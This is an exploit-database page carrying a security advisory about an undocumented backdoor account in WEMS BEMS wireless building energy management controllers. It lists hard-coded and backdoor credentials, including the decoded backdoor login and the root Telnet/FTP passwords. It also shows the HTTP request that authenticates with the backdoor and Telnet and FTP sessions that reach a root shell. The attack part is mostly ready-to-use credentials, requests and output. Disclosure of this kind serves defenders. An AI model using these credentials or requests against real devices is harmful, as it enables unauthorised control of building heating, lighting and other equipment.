Search for hundreds of thousands of exploits

"WEMS BEMS 21.3.1 - Undocumented Backdoor Account"

Author

Exploit author

LiquidWorm

Platform

Exploit platform

hardware

Release date

Exploit published date

2019-12-30

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
# Exploit: WEMS BEMS 21.3.1 - Undocumented Backdoor Account
# Date: 2019-12-30
# Author: LiquidWorm
# Vendor: WEMS Limited
# Product web page: https://www.wems.co.uk
# Advisory ID: ZSL-2019-5552
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5552.php

WEMS BEMS 21.3.1 Undocumented Backdoor Account


Vendor: WEMS Limited
Product web page: https://www.wems.co.uk
Affected version: Web: 21.3.1
                  Web: 20.0beta
                  Web: 19.5
                  Web: 18.4
                  Firmware: 1.26.6 (OS: 5.3)
                  Firmware: 1.23.7 (OS: 5.0)
                  Firmware: 1.21.4 (OS: 4.1a-usb)
                  Firmware: 1.18.0.3 (OS: i686-1.1)
Platform: Shockwave Flash (SWF) / CGI

Summary: We (WEMS) offer the world's first fully wireless energy management system.
Our solution enables your organization to take control of its energy costs, by monitoring
lighting, heating and air conditioning equipment to identify wastage across multiple
sites and start saving money instantly. Additionally, we offer a service which enables
you to personally control the settings of your building - remotely, via text messaging
and the internet - from wherever you happen to be in the world.

Desc: The wireless BMS solution has an undocumented backdoor account that is Base64-encoded.
These sets of credentials are never exposed to the end-user and cannot be changed through
any normal operation of the controller thru the RMI. Attacker could exploit this vulnerability
by logging in using the backdoor account with highest privileges for administration and gain
full system control. The check_users.sh Bash script is used to generate the default accounts
on the system with their passwords and privilege level. The backdoor user cannot be seen in
the users settings in the admin panel and it also uses an undocumented privilege level 3 when
using the addhttpuser program which allows full availability of the features that the WEMS
is offering remotely. WEMS also ships with hard-coded and weak credentials for Telnet/FTP
access using the credentials gast:glasshou or root:glasshou.

Tested on: Linux 2.6.16 armv5tejl
           thttpd/2.25b
           Adam 7000 System
           WEMS OS 5.3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5552
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5552.php


06.07.2019

--


Excerpt content of check_users.sh bash script:
----------------------------------------------

# cat /tmp/check_users.sh
...
...
if [ -n "${varSystem}" ];then
  #add 'V.A.R.' user credentials
  /mnt/bin/addhttpuser -u var -p 88fRK66Q -l 2 > /dev/null
  /mnt/bin/addhttpuser -u varuser -p user -l 1 > /dev/null
  /mnt/bin/addhttpuser -u varview -p view -l 0 > /dev/null
else
  #add 'wems' user credentials
  /mnt/bin/addhttpuser -u wems -p kup5EF4s -l 2 > /dev/null
  /mnt/bin/addhttpuser -u wemsuser -p user -l 1 > /dev/null
  /mnt/bin/addhttpuser -u wemsview -p view -l 0 > /dev/null
fi

echo "Adding logging user credentials..."
/mnt/bin/addhttpuser -u YWRhbWNvbGxlY3Q -p YzAxMTNjdGFkYW0K -l 3 > /dev/null

# Verify user added successfully...
if [ "$?" -eq "255" ]
then
        echo "Error when adding logging user credentials - aborting.."
        cp -p /mnt/etc/httpusers.default /mnt/etc/httpusers
        exit
fi

veri_user=`grep -e 'YWRhbWNvbGxlY3Q' /mnt/etc/httpusers`

if [ -n "$veri_user" ]
then
        echo "User credentials added successfully."
        cp -p /mnt/etc/httpusers /mnt/etc/httpusers.default
        exit
else
        echo "Error when adding user credentials - restoring defaults."
        cp -p /mnt/etc/httpusers.default /mnt/etc/httpusers
fi
----------------------------------------------


Default and hard-coded credentials:
-----------------------------------

WEMS:
 
 [Level 2/Admin - Web/SWF->CGI]     : wems:kup5EF4s
 [Level 1/User - Web/SWF->CGI]      : wemsuser:user
 [Level 0/View - Web/SWF->CGI]      : wemsview:view
 [Level 3/Backdoor - Web/SWF->CGI]  : YWRhbWNvbGxlY3Q:YzAxMTNjdGFkYW0K (adamcollect:c0113ctadam)

V.A.R. (Value Added Reseller):

 [Level 2/Admin - Web/SWF->CGI]     : var:88fRK66Q
 [Level 1/User - Web/SWF->CGI]      : varuser:user
 [Level 0/View - Web/SWF->CGI]      : varview:view

Shell:

 [Level 500/User - Telnet/FTP]      : gast:glasshou
 [Level 0/root - Telnet/FTP]        : root:glasshou
-----------------------------------


By calling the auth command through the cmd parameter, the cgiauth binary
reads the /mnt/etc/httpusers file and checks validation for authentication.
To login with the backdoor account the following HTTP GET request is made:
--------------------------------------------------------------------------

GET /cgi-bin/cgiauth?user=YWRhbWNvbGxlY3Q&pass=YzAxMTNjdGFkYW0K&cmd=auth HTTP/1.1
Host: 192.168.1.17
User-Agent: Noproblem/25.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://192.168.1.17/SMARThome1.swf

Response observed:

HTTP/1.1 200 OK
content-type: text/html
Transfer-Encoding: chunked
Date: Fri, 13 Sep 2019 18:15:17 GMT
Server: WEMS OS 5.0 Casino

sessionid=EQhaZPEXgJQhkXeZ&level=3&username=YWRhbWNvbGxlY3Q


--------------------------------------------------------------------------


Running addhttpuser, reading httpusers file:
--------------------------------------------

# /mnt/bin/addhttpuser
Usage is -u <username> -p <password> -l <level>
# cat /mnt/etc/httpusers
0:wems:$1$3EVBJ96F$RBX7xggVT8.zXM9vDbGWB/:2
1:wemsuser:$1$3EVBJA6F$Gr6zU7L0n4OPq7YdCM5.b1:1
2:wemsview:$1$3EVBJB6F$6XtYBc2VaQYucRe2T7lfa.:0
3:YWRhbWNvbGxlY3Q:$1$3EVBJD6F$scO5furQud3eKLHpNyUyo.:3
# ls -al /mnt/bin/addhttpuser
-rwxr-xr-x    1 root     root        16520 Jan 29  2014 /mnt/bin/addhttpuser
--------------------------------------------


Root shell:
-----------

$ telnet 192.168.1.17
Connected to 192.168.1.17.
Escape character is '^]'.

- Adam 7000 System - Version 4.1a-usb -

WEMS login: gast
Password: 


BusyBox v1.01 (2011.02.24-11:55+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

$ id
uid=500(gast) gid=500
$ su
Password: 


BusyBox v1.01 (2011.02.24-11:55+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

# id
uid=0(root) gid=0(root)
# netstat -nat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN
-----------


$ ftp 192.168.1.17
WEMS FTP server (Version wu-2.6.2(12) Thu Feb 24 14:48:47 GMT 2011) ready.
user root
331 Password required for root.
pass glasshou
230 User root logged in.
Release DateTitleTypePlatformAuthor
2020-09-14"Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path"localwindowsLiquidWorm
2020-08-28"Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation"webappshardwareLiquidWorm
2020-08-26"Eibiz i-Media Server Digital Signage 3.8.0 - Directory Traversal"webappsmultipleLiquidWorm
2020-08-24"Eibiz i-Media Server Digital Signage 3.8.0 - Authentication Bypass"webappshardwareLiquidWorm
2020-08-24"Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure"webappshardwareLiquidWorm
2020-08-17"QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated)"webappshardwareLiquidWorm
2020-08-17"QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure"webappshardwareLiquidWorm
2020-08-17"QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion"webappshardwareLiquidWorm
2020-08-17"QiHang Media Web Digital Signage 3.0.9 - Cleartext Credential Disclosure"webappshardwareLiquidWorm
2020-08-07"All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin)"webappshardwareLiquidWorm
2020-07-26"UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin)"webappshardwareLiquidWorm
2020-07-23"UBICOD Medivision Digital Signage 1.5.1 - Authorization Bypass"webappshardwareLiquidWorm
2020-06-04"Cayin Digital Signage System xPost 2.5 - Remote Command Injection"webappsmultipleLiquidWorm
2020-06-04"Cayin Content Management Server 11.0 - Remote Command Injection (root)"webappsmultipleLiquidWorm
2020-06-04"Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read"webappshardwareLiquidWorm
2020-06-04"Cayin Signage Media Player 3.0 - Remote Command Injection (root)"webappsmultipleLiquidWorm
2020-06-04"SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User)"webappshardwareLiquidWorm
2020-05-08"Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC)"doshardwareLiquidWorm
2020-04-24"Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution"webappsjavaLiquidWorm
2020-04-21"P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin)"webappshardwareLiquidWorm
2020-03-23"FIBARO System Home Center 5.021 - Remote File Include"webappsmultipleLiquidWorm
2020-01-29"Fifthplay S.A.M.I 2019.2_HP - Persistent Cross-Site Scripting"webappshardwareLiquidWorm
2019-12-30"AVE DOMINAplus 1.10.x - Unauthenticated Remote Reboot"webappshardwareLiquidWorm
2019-12-30"AVE DOMINAplus 1.10.x - Credential Disclosure"webappshardwareLiquidWorm
2019-12-30"AVE DOMINAplus 1.10.x - Cross-Site Request Forgery (enable/disable alarm)"webappshardwareLiquidWorm
2019-12-30"AVE DOMINAplus 1.10.x - Authentication Bypass"webappshardwareLiquidWorm
2019-12-30"WEMS BEMS 21.3.1 - Undocumented Backdoor Account"webappshardwareLiquidWorm
2019-12-30"MyDomoAtHome REST API Domoticz ISS Gateway 0.2.40 - Information Disclosure"webappshardwareLiquidWorm
2019-12-30"HomeAutomation 3.3.2 - Cross-Site Request Forgery (Add Admin)"webappsphpLiquidWorm
2019-12-30"HomeAutomation 3.3.2 - Authentication Bypass"webappsphpLiquidWorm
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/47817/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.